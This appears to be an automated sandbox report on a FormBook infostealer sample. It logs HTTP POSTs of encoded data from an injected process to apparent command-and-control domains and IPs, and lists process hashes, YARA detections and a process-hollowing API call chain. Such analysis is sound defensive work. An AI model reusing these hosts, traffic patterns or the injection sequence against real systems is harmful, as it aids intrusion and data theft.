                                                                                                                                  Origin: http://www.optimallogics.services
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.optimallogics.services/l7yl/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Ascii: NBfdCRyH=hSCgej2Mc754/oHhpT9sR1Byt2z1sKLcMVXlbIyRQBGfZNA4j4fieH7/YX6e9jGffL0DstV98pyh94D83A70OeclCE6V5sUgylhKQs6H6dnwVb81aOBqe96ZBN2Tvo3kJ7TrQsamKrNg+ttQ5dhF4j9mqSdgBrzoRNSDkRIS46VhuT9F6IojbfNFiLcgF6RF4l7jhRFb6E2HzULLMe1m/XA=


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  47 | 192.168.2.4 | 50054 | 3.33.130.190 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:55:58.593780994 CET | 10726 | OUT | POST /l7yl/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.optimallogics.services
                                                                                                                                  Origin: http://www.optimallogics.services
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.optimallogics.services/l7yl/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  48 | 192.168.2.4 | 50055 | 3.33.130.190 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:56:01.133799076 CET | 344 | OUT | GET /l7yl/?NBfdCRyH=sQqAdTCbS5ZyyabbpAJZRll0pUbK84aDK2TkSI2WBXnBKfAm5rH7Pn2yJl6n6SmPfYwavNpLnreC9bzezBndAbo3NFWn8dwN0xctZM2wl8nSOv9OdJoKaOI=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.optimallogics.services
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:56:01.746458054 CET | 404 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 07 Nov 2024 11:56:01 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 264
                                                                                                                                  Connection: close
                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?NBfdCRyH=sQqAdTCbS5ZyyabbpAJZRll0pUbK84aDK2TkSI2WBXnBKfAm5rH7Pn2yJl6n6SmPfYwavNpLnreC9bzezBndAbo3NFWn8dwN0xctZM2wl8nSOv9OdJoKaOI=&ZpEH9=TjSP5LXXbN8d4"}</script></head></html>


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                  49 | 192.168.2.4 | 50056 | 104.21.64.124 | 80 | 4480 | C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:56:06.857296944 CET | 609 | OUT | POST /ut59/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.gokulmohan.online
                                                                                                                                  Origin: http://www.gokulmohan.online
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.gokulmohan.online/ut59/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Ascii: NBfdCRyH=/RgfYrMUF6EajAoEf7aBczlzyIy6XWT6k8vc95cQ0IvcnvPNzDuQpSTiWFIjrkeO3Qph00vOxJ3BbrchoT0qvIwytu0xqwFhnFDDdVLAmanQi8BAokkOfTcEWE0c39fTqWo7pl9fq89yjiCxcx/jbuPPaux2TQbFJD8TVlDu6lkp2PROvO6xMGr7ue7MjoN9Ag==
                                                                                                                                  Nov 7, 2024 12:56:08.000544071 CET | 1236 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                  Date: Thu, 07 Nov 2024 11:56:07 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Referrer-Policy: same-origin
                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MGkzJSlWz5J7rARLMDU4NJmweb%2FGo0YWkHjb%2BTkMmVWpyn%2FPkYSmm2MfS6Fqzb7Jw6UQYb%2B77WNI6pNIfx9OS0obF9pQcbFOtGUufDztJE31qr%2BSrjzD7jqyZFaskXV7AywM7DSmUWk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8ded236219e7e91a-DFW
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1778&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=609&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                  50 | 192.168.2.4 | 50057 | 104.21.64.124 | 80
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Nov 7, 2024 12:56:09.843523026 CET | 629 | OUT | POST /ut59/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.gokulmohan.online
                                                                                                                                  Origin: http://www.gokulmohan.online
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.gokulmohan.online/ut59/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:56:10.947571039 CET | 1236 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                  Date: Thu, 07 Nov 2024 11:56:10 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Referrer-Policy: same-origin
                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iqP8vLcSVEuO36QxxgDOsWNPw5LI%2Bg1jkahbvmWtM7Pt0ptLM51fVUjjwaWbDmaTjc3KnD1UEaktQEXcsNGwf7qdqieS59bAjOGSb2A0QIE3%2FfeHIw%2BA%2B6hJNVrUDH49jNdB3qpJTxo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8ded2374b8b28d26-DFW
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1375&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=629&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"



                                                                                                                                  Target ID:0
                                                                                                                                  Start time:06:52:00
                                                                                                                                  Start date:07/11/2024
                                                                                                                                  Path:C:\Users\user\Desktop\SDBARVe3d3.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\SDBARVe3d3.exe"
                                                                                                                                  Imagebase:0x940000
                                                                                                                                  File size:678'400 bytes
                                                                                                                                  MD5 hash:B6E0FB667376CCEBDDAF47C6D4432472
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:2
                                                                                                                                  Start time:06:52:02
                                                                                                                                  Start date:07/11/2024
                                                                                                                                  Path:C:\Users\user\Desktop\SDBARVe3d3.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\SDBARVe3d3.exe"
                                                                                                                                  Imagebase:0xc50000
                                                                                                                                  File size:678'400 bytes
                                                                                                                                  MD5 hash:B6E0FB667376CCEBDDAF47C6D4432472
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2059073406.0000000003CB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2051531686.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:6
                                                                                                                                  Start time:06:52:31
                                                                                                                                  Start date:07/11/2024
                                                                                                                                  Path:C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe"
                                                                                                                                  Imagebase:0x800000
                                                                                                                                  File size:140'800 bytes
                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4134736580.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false

                                                                                                                                  Target ID:7
                                                                                                                                  Start time:06:52:32
                                                                                                                                  Start date:07/11/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\fc.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\SysWOW64\fc.exe"
                                                                                                                                  Imagebase:0x710000
                                                                                                                                  File size:22'528 bytes
                                                                                                                                  MD5 hash:4D5F86B337D0D099E18B14F1428AAEFF
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4134715840.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4134941283.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:moderate
                                                                                                                                  Has exited:false

                                                                                                                                  Target ID:8
                                                                                                                                  Start time:06:52:46
                                                                                                                                  Start date:07/11/2024
                                                                                                                                  Path:C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe"
                                                                                                                                  Imagebase:0x800000
                                                                                                                                  File size:140'800 bytes
                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4136828393.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false

                                                                                                                                  Target ID:9
                                                                                                                                  Start time:06:53:04
                                                                                                                                  Start date:07/11/2024
                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                  Imagebase:0x7ff6bf500000
                                                                                                                                  File size:676'768 bytes
                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true


                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:9.3%
                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                    Signature Coverage:0%
                                                                                                                                    Total number of Nodes:305
                                                                                                                                    Total number of Limit Nodes:17
WriteProcessMemory 21885->21889 21890 7294683 WriteProcessMemory 21885->21890 21886->21737 21887->21885 21888->21885 21889->21885 21890->21885 21892 7295c18 21891->21892 21892->21891 21894 72960e1 21892->21894 21895 72944e8 Wow64SetThreadContext 21892->21895 21896 72944f0 Wow64SetThreadContext 21892->21896 21893 72963ba 21893->21893 21897 7294778 ReadProcessMemory 21894->21897 21898 7294770 ReadProcessMemory 21894->21898 21895->21892 21896->21892 21897->21893 21898->21893 21900 7296317 21899->21900 21905 72944e8 Wow64SetThreadContext 21900->21905 21906 72944f0 Wow64SetThreadContext 21900->21906 21901 7295df8 21902 7295da3 21901->21902 21903 7294438 ResumeThread 21901->21903 21904 7294440 ResumeThread 21901->21904 21902->21737 21903->21902 21904->21902 21905->21901 21906->21901 21908 7295b25 21907->21908 21916 7294910 CreateProcessA 21908->21916 21917 7294907 CreateProcessA 21908->21917 21909 7295bed 21910 72960e1 21909->21910 21914 72944e8 Wow64SetThreadContext 21909->21914 21915 72944f0 Wow64SetThreadContext 21909->21915 21912 7294778 ReadProcessMemory 21910->21912 21913 7294770 ReadProcessMemory 21910->21913 21911 72963ba 21912->21911 21913->21911 21914->21909 21915->21909 21916->21909 21917->21909 21919 7295d6e 21918->21919 21922 72945c8 VirtualAllocEx 21919->21922 21923 72945c3 VirtualAllocEx 21919->21923 21920 7295f29 21921 72960c8 21920->21921 21924 7294688 WriteProcessMemory 21920->21924 21925 7294683 WriteProcessMemory 21920->21925 21921->21737 21922->21920 21923->21920 21924->21920 21925->21920 21927 7295de6 21926->21927 21929 7294438 ResumeThread 21927->21929 21930 7294440 ResumeThread 21927->21930 21928 7295da3 21929->21928 21930->21928 21936 7294688 WriteProcessMemory 21931->21936 21937 7294683 WriteProcessMemory 21931->21937 21932 7295cf7 21933 7295c18 21933->21932 21935 72960e1 21933->21935 21938 72944e8 Wow64SetThreadContext 21933->21938 21939 72944f0 Wow64SetThreadContext 21933->21939 21934 72963ba 21934->21934 21940 7294778 ReadProcessMemory 
21935->21940 21941 7294770 ReadProcessMemory 21935->21941 21936->21933 21937->21933 21938->21933 21939->21933 21940->21934 21941->21934 21943 7295c18 21942->21943 21945 72960e1 21943->21945 21946 72944e8 Wow64SetThreadContext 21943->21946 21947 72944f0 Wow64SetThreadContext 21943->21947 21944 72963ba 21948 7294778 ReadProcessMemory 21945->21948 21949 7294770 ReadProcessMemory 21945->21949 21946->21943 21947->21943 21948->21944 21949->21944 21951 7294778 ReadProcessMemory 21950->21951 21953 7294807 21951->21953 21953->21822 21955 72947c3 ReadProcessMemory 21954->21955 21957 7294807 21955->21957 21957->21822 21959 7294999 CreateProcessA 21958->21959 21961 7294b5b 21959->21961 21963 7294999 CreateProcessA 21962->21963 21965 7294b5b 21963->21965 21967 72944f0 Wow64SetThreadContext 21966->21967 21969 729457d 21967->21969 21969->21826 21971 7294535 Wow64SetThreadContext 21970->21971 21973 729457d 21971->21973 21973->21826 21975 7294688 WriteProcessMemory 21974->21975 21977 7294727 21975->21977 21977->21837 21979 72946d0 WriteProcessMemory 21978->21979 21981 7294727 21979->21981 21981->21837 21983 72945c8 VirtualAllocEx 21982->21983 21985 7294645 21983->21985 21985->21837 21987 7294608 VirtualAllocEx 21986->21987 21989 7294645 21987->21989 21989->21837 21991 729443d ResumeThread 21990->21991 21993 72944b1 21991->21993 21993->21869 21995 7294480 ResumeThread 21994->21995 21997 72944b1 21995->21997 21997->21869 21998 516d950 DuplicateHandle 21999 516d9e6 21998->21999 22000 72969e0 22001 7296b6b 22000->22001 22003 7296a06 22000->22003 22003->22001 22004 72928dc 22003->22004 22005 7296c60 PostMessageW 22004->22005 22006 7296ccc 22005->22006 22006->22003 22007 516d708 22008 516d74e GetCurrentProcess 22007->22008 22010 516d7a0 GetCurrentThread 22008->22010 22011 516d799 22008->22011 22012 516d7d6 22010->22012 22013 516d7dd GetCurrentProcess 22010->22013 22011->22010 22012->22013 22016 516d813 22013->22016 22014 516d83b GetCurrentThreadId 22015 516d86c 22014->22015 22016->22014 
22017 5164668 22018 516467a 22017->22018 22019 5164686 22018->22019 22023 5164781 22018->22023 22029 5164210 22019->22029 22021 51646b1 22024 516478a 22023->22024 22026 51647e0 22023->22026 22033 5164890 22024->22033 22037 516487f 22024->22037 22026->22019 22030 516421b 22029->22030 22045 5165df4 22030->22045 22032 5167472 22032->22021 22035 51648b7 22033->22035 22034 5164994 22034->22034 22035->22034 22041 51644d4 22035->22041 22039 51648b7 22037->22039 22038 5164994 22038->22038 22039->22038 22040 51644d4 CreateActCtxA 22039->22040 22040->22038 22042 5165920 CreateActCtxA 22041->22042 22044 51659e3 22042->22044 22046 5165dff 22045->22046 22049 5165e14 22046->22049 22048 516753d 22048->22032 22050 5165e1f 22049->22050 22053 5165e44 22050->22053 22052 516761a 22052->22048 22054 5165e4f 22053->22054 22057 5165e74 22054->22057 22056 516770d 22056->22052 22058 5165e7f 22057->22058 22060 516888b 22058->22060 22063 516af3a 22058->22063 22059 51688c9 22059->22056 22060->22059 22067 516d028 22060->22067 22072 516af70 22063->22072 22075 516af60 22063->22075 22064 516af4e 22064->22060 22069 516d059 22067->22069 22068 516d07d 22068->22059 22069->22068 22084 516d1d8 22069->22084 22088 516d1e8 22069->22088 22079 516b058 22072->22079 22073 516af7f 22073->22064 22076 516af70 22075->22076 22078 516b058 GetModuleHandleW 22076->22078 22077 516af7f 22077->22064 22078->22077 22080 516b079 22079->22080 22081 516b09c 22079->22081 22080->22081 22082 516b2a0 GetModuleHandleW 22080->22082 22081->22073 22083 516b2cd 22082->22083 22083->22073 22085 516d1e8 22084->22085 22086 516d22f 22085->22086 22092 516bdc0 22085->22092 22086->22068 22090 516d1f5 22088->22090 22089 516d22f 22089->22068 22090->22089 22091 516bdc0 GetModuleHandleW 22090->22091 22091->22089 22093 516bdcb 22092->22093 22095 516df48 22093->22095 22096 516d3e4 22093->22096 22095->22095 22097 516d3ef 22096->22097 22098 5165e74 GetModuleHandleW 22097->22098 22099 516dfb7 22098->22099 22099->22095
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f308d8bc0fbbf24b65176c042892c62eb6ee7f055c884ac57fdacba63a32f18a
                                                                                                                                    • Instruction ID: 79bde7c53416699d99207b55231de8775e4600f1cc4a5ab71a7689ab3964cd97
                                                                                                                                    • Opcode Fuzzy Hash: f308d8bc0fbbf24b65176c042892c62eb6ee7f055c884ac57fdacba63a32f18a
                                                                                                                                    • Instruction Fuzzy Hash: A0E1CAB17212068FDB29DB79C460BAEB7FAAF89700F28447DD1469B391DB34E901CB51

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
Control-flow graph (rendered image not reproduced): entry block 516d6f8, reaching GetCurrentProcess, GetCurrentThread and GetCurrentThreadId.
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0516D786
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0516D7C3
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0516D800
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0516D859
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1694759601.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_5160000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 2063062207-2367252532
                                                                                                                                    • Opcode ID: bd47467689e92f60841b4e08c66dd0b859d6053933934fff016e8fb16c6da682
                                                                                                                                    • Instruction ID: c4b136808a7ab933b2ac65e452a1e0f12af417bdf0eea5bc8ab31141fef7642a
                                                                                                                                    • Opcode Fuzzy Hash: bd47467689e92f60841b4e08c66dd0b859d6053933934fff016e8fb16c6da682
                                                                                                                                    • Instruction Fuzzy Hash: 315146B0A103099FDB04DFA9D548B9EBBF1FB48304F248469E059B73A1DB789984CF65

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
Control-flow graph (rendered image not reproduced): entry block 516d708, reaching GetCurrentProcess, GetCurrentThread and GetCurrentThreadId.
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0516D786
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0516D7C3
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0516D800
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0516D859
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1694759601.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_5160000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 2063062207-2367252532
                                                                                                                                    • Opcode ID: 65f1559ff98d4bd89dc6112e05d8b5a1265ddecdb917cfb73f548d2e18e8adc4
                                                                                                                                    • Instruction ID: be290d539aec7849c1e6901834ca9d0e9711ead84c7b190b39750cf7ecce9f21
                                                                                                                                    • Opcode Fuzzy Hash: 65f1559ff98d4bd89dc6112e05d8b5a1265ddecdb917cfb73f548d2e18e8adc4
                                                                                                                                    • Instruction Fuzzy Hash: A05158B09002099FDB14DFA9D548B9EBBF1FF48304F208459E019B73A0DB749984CF65

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
Control-flow graph (rendered image not reproduced): entry block 7294907, reaching CreateProcessA.
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07294B46
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID: <mQW$<mQW
                                                                                                                                    • API String ID: 963392458-1775728290
                                                                                                                                    • Opcode ID: 13ffc2a73411fc409920186d373bfb152088362164ef0e821158e6e7ef5e44e8
                                                                                                                                    • Instruction ID: 6cf36561dd539b976871d887986fe676117ec8b3496270966c73812987602975
                                                                                                                                    • Opcode Fuzzy Hash: 13ffc2a73411fc409920186d373bfb152088362164ef0e821158e6e7ef5e44e8
                                                                                                                                    • Instruction Fuzzy Hash: E5A16EB1D1025ADFDF14DFA8C8507DEBBB2BF44314F1885A9E808A7240DB749986CF91

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
Control-flow graph (rendered image not reproduced): entry block 7294910, reaching CreateProcessA.
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07294B46
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID: <mQW$<mQW
                                                                                                                                    • API String ID: 963392458-1775728290
                                                                                                                                    • Opcode ID: 14361d96168194e8e37f1511ab848c71866058139e48719a065ad38ae9aa690e
                                                                                                                                    • Instruction ID: 0ce928b6aa729676ea6167cd46523268d12abfbb3d033736c5407536a02b9754
                                                                                                                                    • Opcode Fuzzy Hash: 14361d96168194e8e37f1511ab848c71866058139e48719a065ad38ae9aa690e
                                                                                                                                    • Instruction Fuzzy Hash: D4916EB1D1025ADFDF14DFA8C850BDEBBB6BF44314F1885A9E808A7240DB749986CF91

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
Control-flow graph (rendered image not reproduced): entry block 516b058, reaching GetModuleHandleW.
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0516B2BE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1694759601.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_5160000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HandleModule
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 4139908857-2367252532

                                                                                                                                    Control-flow Graph: CreateActCtxA (block 5165915-51659e1)
                                                                                                                                    APIs
                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 051659D1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1694759601.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
